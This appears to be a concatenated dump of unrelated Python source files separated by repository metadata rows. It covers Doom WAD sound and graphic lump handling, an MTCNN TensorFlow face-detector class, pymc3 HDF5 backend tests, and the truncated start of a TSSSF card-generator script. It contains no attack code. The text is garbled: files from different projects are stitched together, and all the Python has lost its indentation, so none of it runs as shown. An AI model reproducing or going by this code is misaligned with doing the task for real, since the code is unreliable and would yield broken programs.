"""Write data to a file. Target may be a path name string
or a file-like object (with a `write` method)."""
writefile(target, self.data)
def copy(self):
return deepcopy(self)
class Music(Lump):
"""Subclass of Lump, for music lumps. Not yet implemented."""
pass
class Sound(Lump):
"""Subclass of Lump, for Doom format sounds. Supports
conversion from/to RAWs (sequences of bytes), as well as
saving to/loading from various file formats (via PySoundFile).
Useful attributes:
.format -- DMX sound format
.length -- (in frames/samples)
.sample_rate --
.midi_bank -- MIDI patch bank (format 1/2 only)
.midi_patch -- MIDI patch number (format 1/2 only)
Possible values for the 'format' attribute:
0: PC speaker sound
Raw data consists of values 0-127 corresponding to pitch.
Sample rate is fixed at 140Hz.
1: MIDI sound sequence
Raw data consists of MIDI note and pitch bend info.
Sample rate is fixed at 140Hz.
2: MIDI note
Raw data consists of a single MIDI note.
Sample rate is undefined. Length is MIDI note length.
3: Digitized sound (default)
Raw data is 8-bit unsigned PCM.
Sample rate defaults to 11025 Hz, but can be changed.
Only format 3 can be exported to an audio file.
"""
def __init__(self, data=None, from_file=None):
Lump.__init__(self, data, from_file)
# default to an empty digitized sound effect if no data loaded
try:
if self.format is None:
self.format = 3
except TypeError:
pass
def get_format(self):
"""Retrieve the format of the sound."""
if len(self.data) < 2:
format = None
else:
format = unpack('<H', self.data[0:2])[0]
if format > 3:
raise TypeError("Unknown or invalid sound format")
return format
def set_format(self, format):
"""Change the format of the sound.
Warning: Changing a sound's format will erase any existing sound data!"""
try:
if format == self.format:
return # don't do anything if format is the same as before
except TypeError:
pass
if format == 0:
# PC speaker sound
self.data = pack('<HH', format, 0)
elif format == 1:
# MIDI sequence
self.data = pack('<HHHH', format, 0, 0, 0)
elif format == 2:
# single MIDI note
self.data = pack('<HHHHH', format, 0, 0, 0, 0)
elif format == 3:
# digitized sound
self.data = pack("<HHI32x", format, 11025, 32)
else:
raise ValueError("Unknown or invalid sound format")
format = property(get_format, set_format)
def get_length(self):
"""Retrieve the length of the sound."""
format = self.format
if format == 0 or format == 1:
# PC speaker or MIDI sequence
return unpack('<H', self.data[2:4])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[8:10])[0]
elif format == 3:
# digitized sound
return unpack('<I', self.data[4:8])[0] - 32
def set_length(self, length):
"""Set the length of the sound. This will make the lump larger or smaller."""
format = self.format
if length < 0 or length > 65535:
raise ValueError("sound effect length must be between 0-65535")
if format == 2:
# single MIDI note
self.data = self.data[:8] + pack('<H', length)
else:
# grow or shrink existing raw data to new size
self.from_raw(self.to_raw()[0:length] + b'\0'*(length - self.length))
length = property(get_length, set_length)
def get_sample_rate(self):
"""Retrieve the sample rate of the sound. Only useful for digitized sounds."""
format = self.format
if format == 0 or format == 1:
# PC speaker or MIDI sequence
return 140
elif format == 2:
# single MIDI note
return 0
elif format == 3:
# digitized sound
return unpack('<H', self.data[2:4])[0]
def set_sample_rate(self, sample_rate):
"""Set the sample rate of the sound. Only supported for digitized sounds."""
format = self.format
if format == 3:
# digitized sound
self.data = self.data[:2] + pack('<H', sample_rate) + self.data[4:]
else:
raise TypeError("set_sample_rate only supported for digitized sounds (format 3)")
sample_rate = property(get_sample_rate, set_sample_rate)
def get_midi_bank(self):
"""Retrieve the MIDI bank of the sound. Only useful for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
return unpack('<H', self.data[4:6])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[2:4])[0]
def set_midi_bank(self, bank):
"""Set the MIDI bank of the sound. Only supported for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
self.data = self.data[:4] + pack('<H', bank) + self.data[6:]
elif format == 2:
# single MIDI note
self.data = self.data[:2] + pack('<H', bank) + self.data[4:]
else:
raise TypeError("only supported for MIDI sounds (format 1 or 2)")
midi_bank = property(get_midi_bank, set_midi_bank)
def get_midi_patch(self):
"""Retrieve the MIDI patch of the sound. Only useful for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
return unpack('<H', self.data[6:8])[0]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[4:6])[0]
def set_midi_patch(self, patch):
"""Set the MIDI patch of the sound. Only supported for MIDI sounds."""
format = self.format
if format == 1:
# MIDI sequence
self.data = self.data[:6] + pack('<H', patch) + self.data[8:]
elif format == 2:
# single MIDI note
self.data = self.data[:4] + pack('<H', patch) + self.data[6:]
else:
raise TypeError("only supported for MIDI sounds (format 1 or 2)")
midi_patch = property(get_midi_patch, set_midi_patch)
def from_raw(self, data, format=None, sample_rate=None):
"""Replaces the raw values making up the sound.
If 'format' or 'sample_rate' are not specified, the existing values
will be used.
The expected values depend on the value of 'format'.
For format 2, 'data' is expected to be an int.
Otherwise it is expected to be a byte string.
"""
if isinstance(data, bytes):
length = len(data)
if length < 0 or length > 65535:
raise ValueError("sound effect length must be between 0-65535")
# optionally change format if needed
if format is None:
format = self.format
else:
self.format = format
if format == 0:
# PC speaker sound
self.data = self.data[:2] + pack('<H', len(data)) + data
elif format == 1:
# MIDI sequence
self.data = self.data[:2] + pack('<H', len(data)) + self.data[4:8] + data
elif format == 2:
# single MIDI note
self.data = self.data[:6] + pack('<H', data) + self.data[8:]
elif format == 3:
# digitized sound
self.data = self.data[:4] + pack('<I', 32 + len(data)) \
+ b'\0'*16 + data + b'\0'*16
if sample_rate is not None:
self.sample_rate = sample_rate
else:
raise ValueError("Unknown or invalid sound format")
def to_raw(self):
"""Returns the raw values making up the sound as a byte string.
The resulting values depend on the value of 'format'.
For format 2, the value is returned an int.
Otherwise the data is returned as a byte string.
"""
format = self.format
if format == 0:
# PC speaker
return self.data[4:]
elif format == 1:
# MIDI sequence
return self.data[8:]
elif format == 2:
# single MIDI note
return unpack('<H', self.data[6:8])[0]
elif format == 3:
# digitized sound
return self.data[24:-16]
def from_file(self, filename):
"""Load sound from an audio file."""
if filename[-4:].lower() == '.lmp':
self.data = readfile(filename)
else:
with SoundFile(filename) as file:
# get sound data and convert to 8-bit unsigned mono
sound = (file.read(dtype='int16') >> 8) + 128
if file.channels > 1:
sound = np.mean(sound, axis=1)
# create new format 3 sound
self.from_raw(sound.astype('uint8').tobytes(), 3, file.samplerate)
def to_file(self, filename, subtype='PCM_U8'):
"""Save the sound to an audio file.
The output format is selected based on the filename extension.
For example, "file.wav" saves to WAV format. If the file has
no extension, WAV format is used.
See the PySoundFile documentation for possible values of 'subtype'.
Possible values depend on the output format; if the given value is
not supported, the format's default will be used.
Special cases: ".lmp" saves the raw lump data, and ".raw" saves
the raw sound data.
"""
format = os.path.splitext(filename)[1][1:].upper() or 'WAV'
if format == 'LMP': writefile(filename, self.data)
elif format == 'RAW': writefile(filename, self.to_raw())
elif self.format == 3:
if check_format(format, subtype): pass
elif check_format(format, 'PCM_U8'): subtype = 'PCM_U8'
elif check_format(format, 'PCM_S8'): subtype = 'PCM_S8'
else: subtype = None # use default for format
with SoundFile(filename, 'w', self.sample_rate, 1, subtype, format=format) as file:
# convert to signed 16-bit (since SoundFile doesn't directly support 8-bit input)
# the result will just be converted back in the file though
sound = (np.frombuffer(self.to_raw(), dtype='uint8').astype('int16') - 128) << 8
file.write(sound)
else:
raise TypeError("audio file export only supported for digitized sounds (format 3)")
class Graphic(Lump):
"""Subclass of Lump, for Doom format graphics. Supports
conversion from/to RAWs (sequences of bytes) and PIL
Image objects, as well as saving to/loading from various
file formats (via PIL).
Useful attributes:
.dimensions -- (width, height)
.width -- width of the image
.height -- height of the image
.x_offset -- x offset
.y_offset -- y offset
"""
def __init__(self, data=None, from_file=None, palette=None):
self.palette = palette or omg.palette.default
Lump.__init__(self, data, from_file)
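    # Illustrative sketch (filenames are hypothetical): a PNG can be round-tripped through
    # the Doom picture format with
    #   gfx = Graphic(from_file="STIMA0.png"); gfx.to_file("STIMA0.lmp")
    # using the default palette (omg.palette.default) for color matching.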
def get_offsets(self):
"""Retrieve the (x, y) offsets of the graphic."""
return unpack('<hh', self.data[4:8])
def set_offsets(self, xy):
"""Set the (x, y) offsets of the graphic."""
self.data = self.data[:4] + pack('<hh', *xy) + self.data[8:]
def get_dimensions(self):
"""Retrieve the (width, height) dimensions of the graphic."""
return unpack('<hh', self.data[0:4])
offsets = property(get_offsets, set_offsets)
x_offset = property(lambda self: self.offsets[0],
lambda self, x: self.set_offsets((x, self.y_offset)))
y_offset = property(lambda self: self.offsets[1],
lambda self, y: self.set_offsets((self.x_offset, y)))
dimensions = property(get_dimensions)
width = property(lambda self: self.dimensions[0])
height = property(lambda self: self.dimensions[1])
def from_pixels(self, data, width, height, x_offset=0, y_offset=0):
"""Load a list of 8bpp pixels.
Pixels with value None are transparent."""
if min(width, height) < 0 or max(width, height) > 32767:
raise ValueError("image width and height must be between 0-32767")
# First pass: extract pixel data in column+post format
columns_in = [data[n:width*height:width] for n in range(width)]
columns_out = []
for column in columns_in:
# Find the y position where each chunk starts
start_rows = []
postdata = []
in_trans = True
tall = False
offset = 0
for y in range(height):
# split at 128 for vanilla-compatible images without premature tiling
if height < 256:
if y == 128:
in_trans = True
# for tall patch support
elif offset == 254:
in_trans = True
tall = True
# dummy post
start_rows.append(254)
postdata.append(bytearray())
# start relative offsets
offset = 0
if column[y] is None:
in_trans = True
else:
if in_trans:
# start a new post
start_rows.append(offset)
postdata.append(bytearray())
in_trans = False
if tall:
# reset relative offset for tall patches
offset = 0
postdata[-1].append(column[y])
offset += 1
columns_out.append(zip(start_rows, postdata))
# Second pass: compile column+post data, adding pointers
data = []
columnptrs = []
pointer = 4*width + 8
for column in columns_out:
columnptrs.append(pack('<i', pointer))
for row, pixels in column:
data.append(b"%c%c\x00%s\x00" % (row, len(pixels), pixels))
pointer += 4 + len(pixels)
data.append(b'\xff')
pointer += 1
# Merge everything together
self.data = bytes().join([pack('4h', width, height, x_offset, y_offset),
bytes().join(columnptrs), bytes().join(data)])
def from_raw(self, data, width, height, x_offset=0, y_offset=0, pal=None):
"""Load a raw 8-bpp image, converting to the Doom picture format
(used by all graphics except flats)."""
pal = pal or omg.palette.default
pixels = [i if i != pal.tran_index else None for i in data]
self.from_pixels(pixels, width, height, x_offset, y_offset)
def to_pixels(self):
"""Returns self converted to a list of 8bpp pixels.
Pixels with value None are transparent."""
data = self.data
width, height = self.dimensions
output = [None] * (width*height)
pointers = unpack('<%il'%width, data[8 : 8 + width*4])
for x in range(width):
y = -1
pointer = pointers[x]
if pointer >= len(data):
continue
while data[pointer] != 0xff:
offset = data[pointer]
if offset <= y:
y += offset # for tall patches
else:
y = offset
post_length = data[pointer + 1]
op = y*width + x
for p in range(pointer + 3, pointer + post_length + 3):
if op >= len(output) or p >= len(data):
break
output[op] = data[p]
op += width
pointer += post_length + 4
return output
def to_raw(self, tran_index=None):
"""Returns self converted to a raw (8-bpp) image.
`tran_index` specifies the palette index to use for
transparent pixels. The value defaults to that of the
Graphic object's palette instance.
"""
tran_index = tran_index or self.palette.tran_index
output = [i if i is not None else tran_index for i in self.to_pixels()]
return bytes(bytearray(output))
def to_Image(self, mode='P'):
"""Convert to a PIL Image instance."""
if mode != 'RGBA' or isinstance(self, Flat):
# target image has no alpha,
# or source image is a flat (which has no transparent pixels)
im = Image.new('P', self.dimensions, None)
if isinstance(self, Flat):
im.frombytes(self.data)
else:
im.frombytes(self.to_raw())
im.putpalette(self.palette.save_bytes)
return im.convert(mode)
else:
# target image is RGBA and source image is not a flat
im = Image.new('RGBA', self.dimensions, None)
data = bytes().join([self.palette.bytes[i*3:i*3+3] + b'\xff' if i is not None \
else b'\0\0\0\0' for i in self.to_pixels()])
im.frombytes(data)
return im
def from_Image(self, im, translate=False):
"""Load from a PIL Image instance.
If the input image is 24-bit or 32-bit, the colors will be
looked up in the current palette.
If the input image is 8-bit, indices will simply be copied
from the input image. To properly translate colors between
palettes, set the `translate` parameter.
"""
pixels = im.tobytes()
width, height = im.size
xoff, yoff = (width // 2)-1, height-5
if im.mode == "RGB":
pixels = bytes([self.palette.match(unpack('BBB', \
pixels[i*3:(i+1)*3])) for i in range(width*height)])
self.from_raw(pixels, width, height, xoff, yoff, self.palette)
elif im.mode == "RGBA":
pixels = [unpack('BBBB', pixels[i*4:(i+1)*4]) for i in range(width*height)]
pixels = [self.palette.match(i[0:3]) if i[3] > 0 else None for i in pixels]
self.from_pixels(pixels, width, height, xoff, yoff)
elif im.mode == 'P':
srcpal = im.palette.tobytes()
if im.palette.mode == "RGB":
palsize = 3
elif im.palette.mode == "RGBA":
palsize = 4
else:
raise TypeError("palette mode must be 'RGB' or 'RGBA'")
if translate:
R = [c for c in srcpal[0::palsize]]
G = [c for c in srcpal[1::palsize]]
B = [c for c in srcpal[2::palsize]]
srcpal = zip(R, G, B)
lexicon = [self.palette.match(c) for c in srcpal]
pixels = bytes([lexicon[b] for b in pixels])
else:
# Simply copy pixels. However, make sure to translate
# all colors matching the transparency color to the
# right index. This is necessary because programs
# aren't consistent in choice of position for the
# transparent entry.
packed_color = pack("BBB", *self.palette.tran_color)
packed_index = pack("B", self.palette.tran_index)
ri = 0
while ri != -1:
ri = srcpal.find(packed_color, ri+palsize)
if not ri % palsize and ri//palsize != self.palette.tran_index:
pixels = pixels.replace(pack("B", ri//palsize), packed_index)
self.from_raw(pixels, width, height, xoff, yoff, self.palette)
else:
raise TypeError("image mode must be 'P', 'RGB', or 'RGBA'")
def from_file(self, filename, translate=False):
"""Load graphic from an image file."""
if filename[-4:].lower() == '.lmp':
self.data = readfile(filename)
else:
im = Image.open(filename)
self.from_Image(im, translate)
def to_file(self, filename, mode='P'):
"""Save the graphic to an image file.
The output format is selected based on the filename extension.
For example, "file.jpg" saves to JPEG format. If the file has
no extension, PNG format is used.
Special cases: ".lmp" saves the raw lump data, and ".raw" saves
the raw pixel data.
        `mode` may be 'P', 'RGB', or 'RGBA' for palette or 24/32 bit
output, respectively. However, .raw ignores this parameter and
always writes in palette mode.
"""
format = os.path.splitext(filename)[1][1:].upper()
if format == 'LMP': writefile(filename, self.data)
elif format == 'RAW': writefile(filename, self.to_raw())
else:
im = self.to_Image(mode)
if format:
im.save(filename)
else:
im.save(filename, "PNG")
def translate(self, pal):
"""Translate (in-place) the graphic to another palette."""
lexicon = [pal.match(self.palette.colors[i]) for i in range(256)]
lexicon[self.palette.tran_index] = pal.tran_index
if isinstance(self, Flat):
self.data = bytes([lexicon[b] for b in self.data])
else:
raw = self.to_raw()
            self.from_raw(bytes([lexicon[b] for b in raw]),
self.width, self.height,
self.x_offset, self.y_offset)
class Flat(Graphic):
"""Subclass of Graphic, for flat graphics."""
def get_dimensions(self):
sz = len(self.data)
if sz == 4096: return (64, 64)
if sz == 4160: return (64, 65)
if sz == 8192: return (64, 128)
root = int(sz**0.5)
if root**2 != sz:
raise TypeError("unable to determine size: not a square number")
return (root, root)
dimensions = property(get_dimensions)
width = property(lambda self: self.dimensions[0])
height = property(lambda self: self.dimensions[1])
def load_raw(self, data, *unused):
self.data = data
def to_raw(self):
return self.data
| 37.995349 | 97 | 0.559718 |
4a1e418b9fc87bf51981b5f409d58091e44be32a | 2,097 | py | Python | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null | Detection/fcn_detector.py | Akira-sxf/mtcnn | 9e9c1a32f2d3374aa1f0287587a2a211c56a40ac | [
"MIT"
] | null | null | null |
import tensorflow as tf
import sys
sys.path.append("../")
from train_models.MTCNN_config import config
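# FcnDetector wraps a fully-convolutional net for single-image inference: the graph is built
# around dynamic image_width/image_height placeholders, the input is reshaped to a batch of
# one, and predict() returns the face-classification and bounding-box regression maps.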
class FcnDetector(object):
#net_factory: which net
    #model_path: where the params file is located
def __init__(self, net_factory, model_path):
#create a graph
graph = tf.Graph()
with graph.as_default():
#define tensor and op in graph(-1,1)
self.image_op = tf.placeholder(tf.float32, name='input_image')
self.width_op = tf.placeholder(tf.int32, name='image_width')
self.height_op = tf.placeholder(tf.int32, name='image_height')
image_reshape = tf.reshape(self.image_op, [1, self.height_op, self.width_op, 3])
#self.cls_prob batch*2
#self.bbox_pred batch*4
#construct model here
#self.cls_prob, self.bbox_pred = net_factory(image_reshape, training=False)
#contains landmark
self.cls_prob, self.bbox_pred, _ = net_factory(image_reshape, training=False)
#allow
self.sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, gpu_options=tf.GPUOptions(allow_growth=True)))
saver = tf.train.Saver()
#check whether the dictionary is valid
model_dict = '/'.join(model_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(model_dict)
print(model_path)
print(ckpt)
readstate = ckpt and ckpt.model_checkpoint_path
assert readstate, "the params dictionary is not valid"
print("restore models' param")
saver.restore(self.sess, model_path)
def predict(self, databatch):
height, width, _ = databatch.shape
# print(height, width)
cls_prob, bbox_pred = self.sess.run([self.cls_prob, self.bbox_pred],
feed_dict={self.image_op: databatch, self.width_op: width,
self.height_op: height})
return cls_prob, bbox_pred
| 45.586957 | 130 | 0.59752 |
4a1e41b0f40965d7ba3dc21b559b4a258e7b277f | 2,754 | py | Python | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | 3 | 2020-10-06T21:07:30.000Z | 2021-03-04T11:40:17.000Z | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | null | null | null | pymc3/tests/test_hdf5_backend.py | cowirihy/pymc3 | f0b95773047af12f3c0ded04d707f02ddc4d4f6b | [
"Apache-2.0"
] | 3 | 2019-09-09T13:09:32.000Z | 2021-09-12T14:37:51.000Z | # Copyright 2020 The PyMC Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from pymc3.tests import backend_fixtures as bf
from pymc3.backends import ndarray, hdf5
import os
import tempfile
STATS1 = [{
'a': np.float64,
'b': np.bool
}]
STATS2 = [{
'a': np.float64
}, {
'a': np.float64,
'b': np.int64,
}]
DBNAME = os.path.join(tempfile.gettempdir(), 'test.h5')
class TestHDF50dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
class TestHDF50dSamplingStats1(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
sampler_vars = STATS1
shape = ()
class TestHDF50dSamplingStats2(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
sampler_vars = STATS2
shape = ()
class TestHDF51dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = 2
class TestHDF52dSampling(bf.SamplingTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
class TestHDF5Stats(bf.StatsTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
class TestHDF50dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
skip_test_get_slice_neg_step = True
class TestHDF50dSelectionStats1(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
sampler_vars = STATS1
skip_test_get_slice_neg_step = True
class TestHDF50dSelectionStats2(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = ()
sampler_vars = STATS2
skip_test_get_slice_neg_step = True
class TestHDF51dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = 2
skip_test_get_slice_neg_step = True
class TestHDF52dSelection(bf.SelectionTestCase):
backend = hdf5.HDF5
name = DBNAME
shape = (2, 3)
skip_test_get_slice_neg_step = True
class TestHDF5DumpLoad(bf.DumpLoadTestCase):
backend = hdf5.HDF5
load_func = staticmethod(hdf5.load)
name = DBNAME
shape = (2, 3)
class TestNDArrayHDF5Equality(bf.BackendEqualityTestCase):
backend0 = ndarray.NDArray
name0 = None
backend1 = hdf5.HDF5
name1 = DBNAME
shape = (2, 3)
| 22.390244 | 76 | 0.696805 |
4a1e42ce0a3a5c616db1c84e9f6010d3aece863f | 936 | py | Python | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | leads/data.py | leomenezessz/leads-diff | 1b2fb35441f5a8816d825bc839c23fcbd691651f | [
"MIT"
] | null | null | null | import pandas
from pandas import Series
pandas.set_option("display.max_rows", None)
def _remove_series_whitespace(series: Series, field: str = "Email"):
return series[field].str.strip()
class DataFormatter:
def __init__(
self, excel_file_path: str, new_leads_sheet: str, old_leads_sheet: str
):
self.excel = pandas.ExcelFile(excel_file_path)
self._new_leads_series = pandas.read_excel(self.excel, new_leads_sheet)
self._old_leads_series = pandas.read_excel(self.excel, old_leads_sheet)
def leads_diff(self):
new_leads_series = _remove_series_whitespace(series=self._new_leads_series)
old_leads_series = _remove_series_whitespace(
series=self._old_leads_series,
)
return (
self._new_leads_series[~new_leads_series.isin(old_leads_series)],
self._old_leads_series[~old_leads_series.isin(new_leads_series)],
)
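# Illustrative usage (file and sheet names are hypothetical):
#   new_only, old_only = DataFormatter("leads.xlsx", "NewLeads", "OldLeads").leads_diff()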
| 33.428571 | 83 | 0.713675 |
4a1e4335bd62722be9639d891546cf6d85969620 | 2,686 | py | Python | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | 1 | 2019-12-09T23:20:24.000Z | 2019-12-09T23:20:24.000Z | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | null | null | null | liveSidewalk.py | berkott/NavigationAssistant | 1363bface88c1d7e0734cfed67646dbc11ebc90c | [
"MIT"
] | 2 | 2021-04-03T13:52:07.000Z | 2021-04-04T11:58:16.000Z | import sys
import cv2
import numpy as np
sys.path.append("..")
from learningModels import vgg
sys.path.remove("..")
def warpImage(img):
dst_size = (960, 720)
src = np.float32([(200, 300), (760, 300), (0, 720), (960, 720)])
dst = np.float32([(0, 0), (960, 0), (0, 720), (960, 720)])
M = cv2.getPerspectiveTransform(src, dst)
return cv2.warpPerspective(img, M, dst_size)
# def inverseWarpImage(img):
# dst_size = (960, 720)
# src = np.float32([(200, 300), (760, 300), (0, 720), (960, 720)])
# dst = np.float32([(0, 0), (960, 0), (0, 720), (960, 720)])
# M = cv2.getPerspectiveTransform(dst, src)
#
# return cv2.warpPerspective(img, M, dst_size)
def get_lined_image(img, lines, color):
for i in range(2):
a = np.cos(lines[1 + (i*2)])
b = np.sin(lines[1 + (i*2)])
x0 = a * lines[i*2]
y0 = b * lines[i*2]
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * a)
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * a)
cv2.line(img, (x1, y1), (x2, y2), color, 2)
return img
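# reverse_transform below undoes the training-time normalization: theta was stored as a
# fraction of 2*pi and rho as a signed fraction of 760 pixels, so both are scaled back
# before the lines are drawn.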
def reverse_transform(lines):
lines[1] *= (2 * np.pi)
lines[3] *= (2 * np.pi)
if lines[1] > np.pi / 2:
lines[0] *= -760
else:
lines[0] *= 760
if lines[3] > np.pi/2:
lines[2] *= -760
else:
lines[2] *= 760
return lines
def live_video_main():
cap = cv2.VideoCapture('data/video1.mkv')
model = vgg.vgg(0, 0)
# model.load("1574810490")
# model.load("1580713365")
model.load('1580713366')
while True:
ret, frame = cap.read()
cv2.imshow("frame", frame)
orig_img = frame.copy()
# warped = warpImage(frame)
# cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow("smaller", cv2.resize(warpImage(frame), (40, 30), interpolation=cv2.INTER_AREA))
downscaled_frame = np.divide(cv2.resize(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), (120, 90),
interpolation=cv2.INTER_AREA), 255).reshape((90, 120, 1))
x_mod = [downscaled_frame]
prediction = model.predict(np.asarray(x_mod))
# prediction = model.predict(downscaled_frame)
transformed_prediction = reverse_transform(prediction[0])
print("Prediction:", transformed_prediction)
prediction_img = get_lined_image(orig_img, transformed_prediction, (0, 0, 255))
cv2.imshow('Result', prediction_img)
k = cv2.waitKey(50)
if k == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
live_video_main() | 26.333333 | 105 | 0.567759 |
4a1e4395a11f9d40dad6331a50e5d6a499575617 | 27,580 | py | Python | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | null | null | null | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | 3 | 2016-01-12T01:42:31.000Z | 2016-03-28T23:31:53.000Z | TSSSF_CardGen.py | BitokuOokami/CardMachine | d927b062ca96af1313ec94de70053a1e069c20d0 | [
"MIT"
] | 4 | 2015-12-27T01:48:34.000Z | 2019-10-19T03:42:51.000Z | import os, glob, shutil, traceback, random
import PIL_Helper
TYPE, PICTURE, SYMBOLS, TITLE, KEYWORDS, BODY, FLAVOR, EXPANSION, CLIENT = range(9)
DIRECTORY = "TSSSF"
ARTIST = "Pixel Prism"
Expansion_Icon = None
LegacySymbolMode = False
PAGE_WIDTH = 3
PAGE_HEIGHT = 3
TOTAL_CARDS = PAGE_WIDTH * PAGE_HEIGHT
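# Cards are laid out on printable sheets of PAGE_WIDTH x PAGE_HEIGHT (9 per page here);
# the paths below locate card art, shared resources, and the output bleed/crop/vassal images.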
workspace_path = os.path.dirname("workspace")
card_set = os.path.dirname("deck.cards")
CardSet = os.path.dirname("deck.cards")
CardPath = DIRECTORY + "/Card Art/"
ResourcePath = DIRECTORY + "/resources/"
BleedsPath = DIRECTORY + "/bleed-images/"
CropPath = DIRECTORY + "/cropped-images/"
VassalPath = DIRECTORY + "/vassal-images/"
BleedTemplatesPath = ResourcePath + "/bleed templates/"
SymbolsPath = ResourcePath + "/symbols/"
ExpansionIconsPath = ResourcePath + "/expansion icons/"
CardBacksPath = ResourcePath + "/card backs/"
FontsPath = ResourcePath + "/fonts/"
VassalTemplatesPath = DIRECTORY + "/vassal templates/"
VassalWorkspacePath = DIRECTORY + "/vassal workspace/"
VassalImagesPath = os.path.join(VassalWorkspacePath, "images")
VASSAL_SCALE = (260, 359)
VassalCard = [0]
ART_WIDTH = 600
base_w = 889
base_h = 1215
base_w_center = base_w / 2
base_h_center = base_h / 2
w_marg = 31
h_marg = 36
baserect = [(w_marg, h_marg), (base_w - w_marg, base_h - h_marg)]
textmaxwidth = 689
croprect = (50, 63, 788 + 50, 1088 + 63)
TextHeightThresholds = [363, 378, 600]
TitleWidthThresholds = [50] # This is in #characters, fix later plox
BarTextThreshold = [500]
fonts = {
"Title": PIL_Helper.BuildFont(FontsPath + "TSSSFBartholomew-Bold.otf", 55),
"TitleSmall": PIL_Helper.BuildFont(FontsPath + "TSSSFBartholomew-Bold.otf", 45),
"Body": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"BodySmall": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"BodyChangeling": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 31),
"Bar": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 38),
"BarSmall": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 35),
"Flavortext": PIL_Helper.BuildFont(FontsPath + "KlinicSlabBookIt.otf", 28),
"Copyright": PIL_Helper.BuildFont(FontsPath + "TSSSFCabin-Medium.ttf", 18)
}
Anchors = {
"Blank": (base_w_center, 300),
"PonyArt": (173, 225),
"ShipArt": (173, 226),
"GoalArt": (174, 224),
"Symbol1": (58 + 50, 56 + 63),
"Symbol2": (58 + 50, 160 + 63),
"LoneSymbol": (108, 153),
"TimelineSymbol": (58 + 50, 535 + 63),
"GoalSymbol2": (108, 613),
"Title": (-65 - 50, 160),
"TitleTwoLine": (-65 - 50, 159),
"TitleSmall": (-65 - 50, 157),
"Bar": (-68 - 50, 598 + 67),
"Body": (base_w_center, 735),
"BodyShiftedUp": (base_w_center, 730),
"Flavor": (base_w_center, -110),
"Expansion": (640 + 50, 525 + 63),
"Copyright": (-38 - 50, -13 - 61)
}
ArtMissing = [
PIL_Helper.LoadImage(CardPath + "artmissing01.png"),
PIL_Helper.LoadImage(CardPath + "artmissing02.png"),
PIL_Helper.LoadImage(CardPath + "artmissing03.png"),
PIL_Helper.LoadImage(CardPath + "artmissing04.png"),
PIL_Helper.LoadImage(CardPath + "artmissing05.png"),
PIL_Helper.LoadImage(CardPath + "artmissing06.png"),
PIL_Helper.LoadImage(CardPath + "artmissing07.png"),
]
Frames = {
"START": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Start-bleed.png"),
"Warning": PIL_Helper.LoadImage(CardPath + "BLEED_Card - Warning.png"),
"Pony": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Pony-bleed.png"),
"Ship": PIL_Helper.LoadImage(BleedTemplatesPath + "BLEED-Blank-Ship-bleed.png"),
"Rules1": PIL_Helper.LoadImage(CardPath + "BLEED_Rules1.png"),
"Rules3": PIL_Helper.LoadImage(CardPath + "BLEED_Rules3.png"),
